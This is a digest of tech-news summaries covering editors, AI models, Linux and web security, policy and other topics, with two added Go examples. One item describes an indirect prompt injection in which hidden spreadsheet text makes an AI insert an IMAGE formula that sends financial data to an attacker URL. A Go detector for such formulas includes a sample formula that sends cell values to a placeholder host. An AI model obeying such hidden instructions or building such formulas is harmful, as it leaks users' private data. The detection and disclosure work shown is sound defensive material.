Zed, the GPU-accelerated code editor built in Rust by the creators of Atom, has reached version 1.0 after five years of development. Rather than building on Electron or web technology, Zed created its own UI framework (GPUI) that renders via GPU shaders, enabling exceptional performance across Mac, Windows, and Linux. The 1.0 release covers multi-language support, Git integration, SSH remoting, debugging, and over a million lines of code. Zed is AI-native from the ground up, supporting parallel agents, keystroke-level edit predictions, and the Agent Client Protocol (ACP), integrating external agents including Claude, Codex, OpenCode, and Cursor. The team is also launching Zed for Business with centralized billing and role-based access controls. Looking ahead, DeltaDB — a CRDT-based synchronization engine — is in development to enable character-level collaborative editing between humans and AI agents, a capability the team argues is impossible without owning the full stack.
CVE-2026-31431, "Copy Fail," is a Linux local privilege escalation found by AI tool Xint Code in roughly one hour. Unlike typical LPEs requiring race conditions or kernel-specific offsets, this straight-line logic flaw in authencesn AEAD handling chains through AF_ALG sockets and splice() into a 4-byte page-cache write, requiring only an unprivileged local user. A 732-byte Python 3.10+ script works unmodified across all mainstream Linux distributions with kernels built between 2017 and the patch, confirmed on Ubuntu 24.04, Amazon Linux 2023, RHEL 10.x, and SUSE 16. The attack surface spans shared dev boxes, CI runners, container hosts, and any multi-user kernel environment. Mitigation includes disabling algif_aead via modprobe, blocking AF_ALG via seccomp, or applying mainline kernel commit a664bf3d603d, which reverts the 2017 in-place algif_aead optimization. The PoC is published for defenders to verify systems; the same scan surfaced additional high-severity bugs still under coordinated disclosure.
A GitHub issue revealed that Claude Code (v2.1.119) routes API requests to "extra usage" billing instead of the included Max plan quota when "HERMES.md" appears in recent git commit messages. The bug affected a Max 20x plan subscriber ($200/month) who consumed only 13% of weekly capacity but was charged $200.98 in extra usage. The trigger is specifically the string in commit history — not a file on disk — and is case-sensitive: lowercase "hermes.md," "HERMES" alone, and "HERMES.txt" don't trigger it. Claude Code includes recent commits in its system prompt, and something server-side routes differently when HERMES.md is detected. The user identified the cause through systematic binary search, testing orphan branches and isolating individual commit strings. Initial Anthropic support denied compensation for technical errors — later confirmed to have been an AI-generated response. Thariq from the Claude Code team announced full refunds plus bonus credits equal to each affected user's monthly subscription. Anthropic attributed the root cause to "an overactive anti-abuse system" that has since been fixed.
Rheinmetall, Germany's largest defense firm, has dramatically scaled up ammunition and military equipment production, with CEO Armin Papperger claiming Germany now surpasses the United States in conventional ammunition production capacity. Artillery shell output grew from 70,000 to 1.1 million per year, medium-caliber ammunition from 800,000 to 4 million, and military trucks from 600 to 4,500 annually. The company received 350,000 job applications in 2025 alone, currently employs 44,000 people (targeting 70,000 by 2030), and works with 11,500 German suppliers—4,500 of which also serve the automotive sector. Papperger suggests arms production could replace roughly a third of jobs lost in Germany's declining automotive industry. This expansion aligns with Germany's first-ever official military strategy naming Russia the primary threat to European security, with Berlin aiming to build Europe's most powerful conventional army.
FastCGI, 30 years old, solves two critical HTTP security problems in reverse proxy-to-backend communication. HTTP/1.1's ambiguous message framing enables desync/request-smuggling attacks where proxy and backend disagree on message boundaries — a recurring vulnerability despite patching efforts. FastCGI uses explicit framing; HTTP/2 also fixes this but has far less proxy support (nginx only added HTTP/2 backend support in late 2025, Apache's remains experimental). HTTP also lacks structural separation between trusted proxy-injected headers and untrusted client headers, allowing spoofing of X-Real-IP or True-Client-IP. FastCGI solves this by prefixing client HTTP headers with "HTTP_", with REMOTE_ADDR automatically populating Go's http.Request. Major proxies (nginx, Apache, Caddy, HAProxy) support FastCGI, and Go's stdlib makes switching as simple as replacing http.Serve with fcgi.Serve. Downsides include no WebSocket support, inferior tooling (curl cannot make FastCGI requests), and unoptimized throughput on some workloads. The author has run FastCGI in production for over 10 years and advocates adoption despite its vintage status.
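The header separation described above, shown with Go's standard library (an added example, not code from the original article): `cgi.RequestFromMap` applies the CGI variable mapping to a constructed parameter set of the kind a proxy would send. The parameter values, host names and the helper names `proxyParams`, `decode`, `peerIP` and `fromLoopback` are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"net"
	"net/http"
	"net/http/cgi"
)

// proxyParams returns a constructed parameter set for one proxied request.
// Client request headers arrive only under the HTTP_ prefix (CONTENT_TYPE and
// CONTENT_LENGTH are the CGI exceptions), so no header can overwrite REMOTE_ADDR.
func proxyParams() map[string]string {
	return map[string]string{
		// Set by the proxy from the connection it accepted.
		"REQUEST_METHOD":  "GET",
		"SERVER_PROTOCOL": "HTTP/1.1",
		"REQUEST_URI":     "/account",
		"REMOTE_ADDR":     "203.0.113.7",
		"REMOTE_PORT":     "51234",
		// Copied from the client's headers, always prefixed.
		"HTTP_HOST":        "app.example.test",
		"HTTP_X_REAL_IP":   "127.0.0.1", // client tries to look local
		"HTTP_REMOTE_ADDR": "127.0.0.1", // a header literally named Remote-Addr
	}
}

// decode converts the parameter set into an *http.Request.
func decode(params map[string]string) (*http.Request, error) {
	return cgi.RequestFromMap(params)
}

// peerIP returns the address the proxy reported, ignoring every client header.
func peerIP(r *http.Request) string {
	host, _, err := net.SplitHostPort(r.RemoteAddr)
	if err != nil {
		return ""
	}
	return host
}

// fromLoopback is a sample access decision keyed on the proxy-reported peer.
func fromLoopback(r *http.Request) bool {
	ip := net.ParseIP(peerIP(r))
	return ip != nil && ip.IsLoopback()
}

func main() {
	r, err := decode(proxyParams())
	if err != nil {
		panic(err)
	}
	fmt.Println("peer from REMOTE_ADDR:     ", peerIP(r))
	fmt.Println("X-Real-IP client header:   ", r.Header.Get("X-Real-IP"))
	fmt.Println("Remote-Addr client header: ", r.Header.Get("Remote-Addr"))
	fmt.Println("treated as loopback:       ", fromLoopback(r))
}
```

The spoofed values remain visible as ordinary headers, but the access decision reads only `RemoteAddr`, which is filled from the unprefixed `REMOTE_ADDR` parameter.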
Neal Agarwal has launched a new multiplayer cursor-based interactive playground on neal.fun, where visitors from around the world share a whimsical virtual space and interact in real time through their cursors. The world features activities including beach volleyball, soccer, a pool with a diving board, a stage for impromptu dance parties, a cave with a flashlight effect, a waterfall, a DJ booth, and a beach yurt serving mushroom soup. Players can earn nine badges — Cannonball!, Treasure Hunter, Goal!, S'more Please, Cat Person, Take a Seat, Slide!, Beachcomber, and Green Thumb — by discovering hidden interactions. Technical highlights include use of Rive for animation, country-based player detection that differs from standard GeoIP, and mobile support, though some devices heat up under sustained use. One friction point noted is that re-implementing mouse movement introduces sensitivity problems on trackpads.
Gooseworks, a 3-person startup from the founders of Athina AI (used by Perplexity, Doximity, and others), is hiring a Founding Growth Engineer to build and operate AI-powered growth engines for customers using their "Goose" platform. The role splits roughly 50/50 between running real GTM work for customers (outbound, SEO/AEO, Reddit, influencer marketing, content) and R&D to convert those one-off engagements into templatized, self-serve playbooks that Goose agents run autonomously. Goose is described as an OpenClaw-style AI coworker with its own filesystem, memory, email, accounts, and integrations, reachable via Slack, Telegram, or email like any human coworker. Their thesis is that GTM/growth work is undergoing the same transformation coding did three years ago, with orchestration and workspace context being the bottleneck rather than model capability. The target customer is founders, GTM engineers, and growth operators at fast-growing startups who want 10x execution speed. The ideal candidate has measurable, compounding growth results from prior startups or agency work—viral launches and Product Hunt wins explicitly don't meet the bar.
Haskell earns praise for its powerful type system, algebraic data types, monads, and popularizing mathematical concepts in programming, but proves frustrating for rapid prototyping due to monadic abstraction overhead, strict pure/impure separation, and complex dependency management. The author describes spending hours wrestling with Haskell's XML libraries where a JVM solution would take minutes, ultimately abandoning the prototype entirely. Scheme (specifically GNU Guile) is preferred for its interactive REPL via SWANK-style integration—enabling live debugging, incremental development, and function redefinition without restart—and its flexible macro system that allows metaprogramming with far less ceremony than Haskell's Template Haskell. Haskell's DSL-heavy Hackage ecosystem (Parsec, Servant, etc.) imposes steep, inconsistent learning curves across libraries, while Lisp's s-expressions provide a unified data representation model. The author frames Haskell as a "platonic ideal" illuminating functional programming theory but too rigid for most practical work, while acknowledging Scheme's weaker enterprise ecosystem versus JVM alternatives.
A webpage attempts to illustrate Monero's core privacy feature by presenting a specific Monero wallet address and noting that any attempt to view its balance is futile — Monero's protocol by design hides transaction amounts and balances from outside observers, unlike transparent blockchains such as Bitcoin. The address shown (47xmhb...S7Fyv2) is not random; it belongs to The Rage, an independent journalism outlet, and is used for public donations. The page's tone is sardonic, framing the privacy block as Monero "saying no" to snooping, effectively serving as both a demonstration and a soft advertisement for Monero's anonymity guarantees.
The content catalogs roughly 30 foundational UX and cognitive psychology principles as brief one-sentence definitions, covering interaction design (Fitts's Law, Hick's Law, Doherty Threshold <400ms), visual perception via Gestalt principles (proximity, similarity, closure, common region, uniform connectedness), and memory constraints (Miller's 7±2 items, serial position effect, working memory, Zeigarnik Effect). Behavioral patterns include the Pareto 80/20 rule, Parkinson's Law, goal-gradient effect, and peak-end rule. Other entries cover Jakob's Law, Tesler's Law of Conservation of Complexity, Von Restorff isolation effect, Occam's Razor, Postel's Law, aesthetic-usability effect, cognitive bias, cognitive load, mental models, flow state, chunking, selective attention, and poka-yoke (users skip manuals). The collection is formatted as a poster-style visual reference aimed at designers and developers seeking a consolidated checklist of established UX principles.
A vulnerability in Ramp's Sheets AI allowed indirect prompt injections hidden in externally sourced datasets to manipulate the AI into inserting malicious formulas that silently exfiltrate financial data with no user approval. The attack embeds white-on-white hidden text in an imported dataset, instructing the AI to collect sensitive data and build an IMAGE formula pointing to an attacker URL with the victim's financials appended as query parameters—which fires automatically. PromptArmor disclosed the issue to Ramp on February 19, 2026, but received no response until March 14 after two follow-ups; Ramp attributed the delay to a transition between disclosure programs and confirmed a fix on March 16. A nearly identical flaw was previously found in Claude for Excel; Anthropic remediated it with a red warning interstitial displaying full formulas before insertion. Ramp's specific fix was not publicly detailed.
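One way to flag AI-proposed formulas of the shape described above before they are inserted (an added example, not Ramp's, Anthropic's or PromptArmor's code). The `Finding` type, the regular expressions, the verdict names and the sample formulas are assumptions constructed for illustration; only the IMAGE function comes from the page.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is the gate's decision for one proposed formula.
type Finding struct {
	Verdict string // "allow", "review" or "block"
	Host    string // destination host found in a string literal, if any
	Reason  string
}

// fetchCall matches functions that make the sheet request a URL. Only IMAGE is
// named on the page; extend the pattern for the spreadsheet engine in use.
var fetchCall = regexp.MustCompile(`(?i)\bIMAGE\s*\(`)

// cellRef matches A1-style references such as B2, $C$14 or Sheet1!D7.
var cellRef = regexp.MustCompile(`\b[A-Za-z]{1,3}\$?[0-9]+\b`)

// strLit matches one double-quoted string literal.
var strLit = regexp.MustCompile(`"[^"]*"`)

// maskLiterals blanks the contents of quoted strings while keeping byte
// offsets, so literal text is never mistaken for a call or a cell reference.
func maskLiterals(formula string) string {
	return strLit.ReplaceAllStringFunc(formula, func(s string) string {
		return `"` + strings.Repeat("_", len(s)-2) + `"`
	})
}

// Classify decides whether a proposed formula may be inserted without review.
func Classify(formula string) Finding {
	masked := maskLiterals(formula)
	loc := fetchCall.FindStringIndex(masked)
	if loc == nil {
		return Finding{Verdict: "allow"}
	}
	// Walk to the parenthesis that closes the fetch call.
	end, depth := len(masked), 1
	for i := loc[1]; i < len(masked) && depth > 0; i++ {
		switch masked[i] {
		case '(':
			depth++
		case ')':
			if depth--; depth == 0 {
				end = i
			}
		}
	}
	f := Finding{Verdict: "review", Reason: "formula fetches an external resource"}
	for _, lit := range strLit.FindAllString(formula[loc[1]:end], -1) {
		if u, err := url.Parse(strings.Trim(lit, `"`)); err == nil && u.Host != "" {
			f.Host = u.Host
			break
		}
	}
	// A cell reference inside the call means sheet data reaches the request.
	if cellRef.MatchString(masked[loc[1]:end]) {
		f.Verdict = "block"
		f.Reason = "fetch URL is built from cell contents"
	}
	return f
}

func main() {
	// Constructed sample formulas; the hosts are placeholders.
	for _, s := range []string{
		`=SUM(B2:B14)`,
		`=IMAGE("https://cdn.example.test/logo.png")`,
		`=IMAGE("https://collector.example.test/p.png?r=" & B2 & "-" & Sheet1!$C$14)`,
	} {
		f := Classify(s)
		fmt.Printf("%-6s host=%-24q %s\n", f.Verdict, f.Host, s)
	}
}
```

A "review" verdict corresponds to showing the full formula to the user before insertion; "block" covers the case where cell contents would be sent in the request.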
This open-source project provides freely available plans for a 3D-printed stethoscope validated in a peer-reviewed PLOS ONE study to perform comparably to the Littmann Cardiology III gold standard, with total material cost targeting ~$1-4 USD. Printed components — head, ear tubes, Y-piece, spring, and ring — must be produced in PETG or ABS at mandatory 100% infill with 0.2mm layer height, as any lower infill directly degrades acoustic output. Hardware includes silicone tubing in two diameters (8mm ID/13mm OD and 4mm ID/8mm OD, both 50 durometer), a 40mm diaphragm cut from a ~0.35mm plastic report cover, and standard large earbuds. PLA is explicitly discouraged due to heat deformation and early spring failure. Source files are generated via CrystalSCAD and OpenSCAD, and the project is released under the TAPR Open Hardware License. Assembly involves attaching the diaphragm to the head, routing silicone tubing through the Y-piece, and connecting spring-mounted ear tubes to standard earbuds.
Postgres lateral joins let subqueries reference preceding FROM clause columns, producing the same query plan as a standard INNER JOIN. This enables composable query DSLs, unlike ORMs (which hide joins but cause painful M2M update bugs) or plain SQL generators (which lack composability). Inspired by Haskell's Rel8, the author built a Rust equivalent where each closure line adds a CROSS JOIN LATERAL and where_ adds a WHERE clause. Expr<'scope, T> uses Rust's borrow checker to prevent expressions escaping their valid scope. User tables use a TableMode GAT that switches field types between &str, raw values, and Expr, with MapTable enabling field traversal without combinatorial trait impls. The library supports aggregations via .aggregate(), left-outer joins via .optional(), and row collection via .many(). Compile-time guarantees ensure only valid SQL is generated. Sea-query serves as the underlying AST builder.
Elsevier removed John Goodell, Editor-in-Chief of RIBAF, in a citation cartel crackdown that already ousted Brian Lucey and Samuel Vigne from five other journals. Goodell's output surged from single digits pre-2021 to 53-58 papers annually, propelled by 125 papers gifted across three journals he co-controlled, pushing his citations to 15,663—with 4,203 earned in 2025 alone, producing the J-curve signature of citation rings. The scheme was an industrial quid pro quo: junior scholars submitted to RIBAF, added Goodell as co-author at other journals, and their submissions were accepted. A network analysis placed Goodell as the most influential researcher among 500 top finance professors in the Elsevier ecosystem. One Edinburgh Napier professor published 22 RIBAF papers in 2024-2025, adding Goodell to 14 papers at other journals, and appears to have scrubbed and quietly restored those publications from Google Scholar. Elsevier's guidelines require editorial recusal for co-author submissions—rules Goodell violated hundreds of times. An estimated 200-350+ RIBAF papers are retraction candidates, but Elsevier appears to be containing the scandal rather than confronting it.
Kyoto's cherry blossom peak bloom dates have been recorded since 812 AD, forming what is regarded as the longest continuous record of any natural phenomenon on Earth. Compiled by Yasuyuki Aono from imperial diaries, monastery records, and modern meteorological data — archived at NOAA Paleoclimatology — the dataset reveals a clear climate signal over more than a millennium. For most of that span, peak bloom fell in early-to-mid April, with the Little Ice Age visible as a drift toward later peaks between the 14th and 19th centuries. Beginning around 1900, the 30-year rolling mean fell sharply, dropping below any value recorded during the Heian period. The 2026 peak arrived March 29 — over two weeks earlier than the pre-modern average. Though local to one species in one city, its extraordinary length makes it a uniquely credible climate proxy. The piece also notes that centuries of observation gave Japanese a precise seasonal vocabulary — words like 満開 (mankai, full bloom) and 花吹雪 (hanafubuki, blossom blizzard) — and uses this to promote JIVX, an AI-graded Japanese language app.
Tangled is a federated Git collaboration platform built on AT Protocol, positioning itself as a GitHub alternative amid recent reliability concerns. Code servers called "knots" use standard git for transfer while AT Protocol handles issues, pull requests, follows, stars, and collaborator invites. Developers can push to their own server and open pull requests against repos on entirely different servers. Social features integrate with the broader Bluesky ecosystem. Active users praise the Spindles CI/CD system, static site hosting, native Jujutsu VCS support, and an open API built on shared AT Protocol standards. Tangled has received seed funding including from Bain Capital Crypto, raising enshittification concerns typical of VC-backed platforms. Critics debate whether AT Protocol is preferable to ActivityPub, modernized email-based workflows like git format-patch, or simply configuring multiple git remotes. Alternatives include ForgeFed, Forgejo's federation roadmap, Nostr-based gitworkshop.dev, and Radicle. Some argue what is truly needed is an implementation-agnostic SDLC API standard rather than another federated transport protocol.
The Dutch government has launched code.overheid.nl, a self-hosted open-source code platform built on Forgejo, an open-source European alternative to GitHub and GitLab that prioritizes digital sovereignty. The pilot is initiated by the Open Source Program Office at the Ministry of Interior (BZK), in collaboration with DAWO, Opensourcewerken, and developer.overheid.nl, with participation not yet open to all government bodies. A notable early project is "regelrecht," which encodes Dutch legal texts as structured YAML and executes them as deterministic decision logic with full explanation trails. Germany operates a comparable platform at opencode.de (built on GitLab) with hardened container images, while the UK government has catalogued over 17,000 open-source projects. The platform launched to significant public interest, experiencing an HN-driven traffic spike, but issues noted include dark mode readability failures, i18n inconsistencies, residual GitHub references in repos, and a choice to deploy pre-release Forgejo v16 over stable v15.
Operation PowerOFF is an international law enforcement effort led largely by the Dutch Police targeting DDoS-for-hire services. A researcher found two honeypot sites: cyberzap.fun, a covert fake booter with a realistic dashboard collecting user IPs and emails as evidence, and netcrashers.net, an overt scare-tactic site redirecting visitors to a police warning page. The covert site used bit.nl hosting — a Dutch police telltale — and had only 14 prior "attack" orders, suggesting limited reach. After registering with an obvious research email, the researcher found cyberzap.fun locked with a 401 shortly after probing, along with an unused associated domain. The operation also released an AI-generated video dramatizing a police raid on a teenager for DDoS attacks, dismissed as propaganda. The broader goal appears to be creating suspicion around booter services to deter users beyond just making arrests. Operation PowerOFF used similar infiltration tactics before, documented by the UK's NCA in 2023. Cyberzap.fun was registered April 3, 2025 but was empty when archived in July 2025, raising questions about its actual launch.
A post by @GlennMeder on X (inaccessible without JavaScript) argues mandatory online age verification is a trojan horse for mass surveillance, warning that identity infrastructure will ultimately require all users to prove who they are before accessing websites or apps. The post claims children will lose the ability to explore or speak freely online without permanent logging. This is debated against accelerating legislation: the UK's Online Safety Act is in effect, Australia has social media age limits with influencer loopholes, and Greece has reportedly moved to ban online anonymity entirely. Technical alternatives cited include zero-knowledge proofs, fully homomorphic encryption, anonymous credential systems, RTA content headers, and Estonia's hardware-key identity model. Critics argue parental responsibility — not surveillance infrastructure — should govern children's internet access, while supporters contend age verification for social media and pornography reasonably extends existing regulations around gambling and alcohol.
The blaster beam is a large electric instrument — a 12–18-foot metal beam strung with tensed wires and fitted with movable guitar pickups — that produces a distinctive dark, bass tone when plucked or struck with fingers, sticks, or pipes. Designed by John Lazelle in the early 1970s and first widely used by Francisco Lupica, it gained widespread fame through Craig Huxley's refined aluminum version, most notably in Jerry Goldsmith's score for Star Trek: The Motion Picture (1979) as the signature V'ger sound, and earlier that year on a Wonder Woman episode. Huxley patented his design in 1984 and co-wrote David Shire's 2010 (1984) score, while James Horner used it in Battle Beyond the Stars (1980) and Star Trek II: The Wrath of Khan (1982). It also appeared in The Black Hole, Dreamscape, Meteor, and Star Wars: Episode II for the seismic charge sound, and in Bear McCreary's 10 Cloverfield Lane (2016). A notable curiosity arose in the early 1990s when women at a Central Park concert claimed arousal from the sound, prompting an Australian radio experiment that yielded no similar results from listeners.
Vera is a programming language designed for LLMs to write, compiling to WebAssembly and running in browser or CLI. Rather than variable names, it uses typed structural references (@Int.0, @Int.1) to eliminate naming errors models commonly make. Every function requires mandatory contracts — preconditions, postconditions, and effect declarations — verified by Z3 SMT solver, making division by zero a compile-time type error. Effects are fully typed: a function using HTTP or LLM inference must declare those in its signature, and callers lacking those permissions cannot invoke it. Three-tier verification covers decidable arithmetic statically, guided cases, and runtime fallback. The compiler emits LLM-oriented diagnostics with stable error codes, JSON output, and fix instructions with code examples. VeraBench results show Kimi K2.5 achieves 100% run_correct on Vera versus Python's 86% and TypeScript's 91%, with three models beating TypeScript. The reference compiler is at v0.0.127 with 3,638 tests and 96% code coverage; the roadmap targets a verified MCP tool server where contracts guarantee tool schemas at compile time.
Maryland became the first US state to ban grocery surveillance pricing, signed Tuesday by Governor Wes Moore. Surveillance pricing uses personal data — location, search history, demographics — to charge buyers the maximum they'll pay. The FTC under Biden documented the practice broadly, but the current administration is unlikely to act; Colorado, California, Massachusetts, Illinois, and New Jersey are considering similar laws. Critics say Maryland's law is undermined by exemptions for loyalty programs and promotional offers — letting retailers raise baseline prices then offer personalized discounts, achieving the same discriminatory outcome the law aims to prohibit. Enforcement falls to the attorney general only; individuals cannot sue, and penalties are capped at $10,000 for a first offense and $25,000 for subsequent violations. Consumer Reports called enforcement "weak" and urged lawmakers to revisit the legislation. Instacart, previously exposed by Consumer Reports, says it already stopped the practice. Advocates warn other states may replicate Maryland's law, calling it an "industry-written permission slip."
Mitchell Hashimoto, creator of Ghostty terminal emulator and GitHub user #1299 since February 2008, announced Ghostty will leave GitHub after 18 years, citing near-daily platform outages blocking productive work. Over a recent month he kept a journal marking impacted days — nearly every day got an X — with the core problem being not Git itself but centralized tooling around it: Issues, PRs, and Actions. He describes deep personal attachment to GitHub but says it is "no longer a place for serious work." The migration is incremental: a read-only mirror stays at the current URL, personal projects remain on GitHub for now, and the team is evaluating commercial and FOSS alternatives, with an announcement due in coming months. Hashimoto pre-empts two criticisms: the timing is coincidental with the large April 27, 2026 Elasticsearch outage (the post was written a week earlier referencing a separate Actions outage), and the problem is not distributed Git but GitHub's centralized infrastructure layer. He also apologizes for publicly lashing out at GitHub employees, attributing his anger to genuine long-standing affection for the platform.
macOS virtualization on Apple Silicon is built on a hypervisor and Virtio drivers (a standard by Rusty Russell), which abstract I/O devices so that virtualizer apps need only configure Virtio devices rather than implement low-level hardware support. Apple built Virtio into macOS with Monterey, so both host and guest must run Monterey or later. Performance is near-native: CPU single-core ~94% of host, GPU Metal ~92%, and VM Performance-core threads can outpace the host's Efficiency-core equivalent. Rosetta 2 works inside macOS VMs for 64-bit Intel apps but cannot translate a guest OS (UTM handles that via emulation). Key limitations include: most App Store apps fail due to signing restrictions; a hard cap of two concurrent VMs is enforced by macOS; iCloud requires Sequoia on both host and guest. Network always presents as Ethernet, audio is partial, and the license limits VM use to dev, testing, macOS Server, or personal non-commercial use. Practical uses include compatibility testing, sandboxed security work, running version-incompatible apps, and accessing a secondary iCloud account.
Mistral has released Medium 3.5, a 128B dense model with a 256k context window handling instruction-following, reasoning, and coding in a single set of weights, available as open weights under a modified MIT license. Scoring 77.6% on SWE-Bench Verified, it outperforms Devstral 2 and Qwen3.5 397B A17B while self-hosting on as few as four GPUs, becoming the new default in Le Chat and Vibe CLI. Remote cloud coding agents in Vibe allow async sessions to run in parallel, with local CLI sessions "teleportable" to the cloud carrying full session history and approvals. Integrations span GitHub, Linear, Jira, Sentry, and Slack, targeting high-volume defined work like refactors, test generation, and dependency upgrades. A new Work mode in Le Chat uses Medium 3.5 as a multi-step agentic backend for cross-tool workflows across email, calendar, documents, and web research, requiring explicit approval before sensitive actions. API pricing is $1.5 per million input tokens and $7.5 per million output tokens, on Pro, Team, and Enterprise plans, with open weights on Hugging Face.
Tim Paterson's original DOS source listings — physical printouts on continuous-feed paper — have been transcribed and published as compilable assembly source code. The collection spans 10 bundles printed between 1981 and 1982, containing the 86-DOS 1.00 kernel, various PC-DOS 1.00 pre-release kernels and utilities, and the Microsoft BASIC-86 Compiler runtime library. Key files include 86DOS.ASM, 86DOS.A86, EDLIN.DIF, CHKDSK.A86, and BASLIB.PRT. Three download tiers are offered: raw transcription of printer output, extracted original files, and fully compilable source. CRC checksums embedded in the original printout margins were used to self-verify OCR accuracy during transcription. The source targets Seattle Computer Products' ASM assembler and HEX2BIN utility, both available from early 86-DOS or MS-DOS releases. Bundles 9 and 10, totaling nearly 480 pages covering the BASIC runtime library and graphics routines (PAINT.ASM, CIRCLE.ASM), remain untranscribed and are open for pull request contributions. The release enables direct examination of whether CP/M code from Gary Kildall was incorporated into the earliest DOS version.
AT Protocol (atproto) is a decentralized social data network developed by Bluesky where all social objects — posts, likes, follows, profiles — are stored as strongly-typed JSON records in user repositories. Records use shared schemas for composition and extension, content-IDs for strong cross-user linking, and every object has a canonical URL. The protocol exposes a public firehose (WebSocket event stream) of all public activity requiring no API key, letting developers build feeds, bots, search engines, and live applications. A bsky.storage tool automates periodic account data backups to a storage network and provides PLC identity backup and recovery, giving users stronger data control without self-hosting a full Personal Data Server (PDS). The protocol's core model is: users publish JSON records into repositories, and changestreams of those records sync across the network to drive applications — though this summary is buried behind a "GET STARTED" click rather than displayed prominently on the landing page.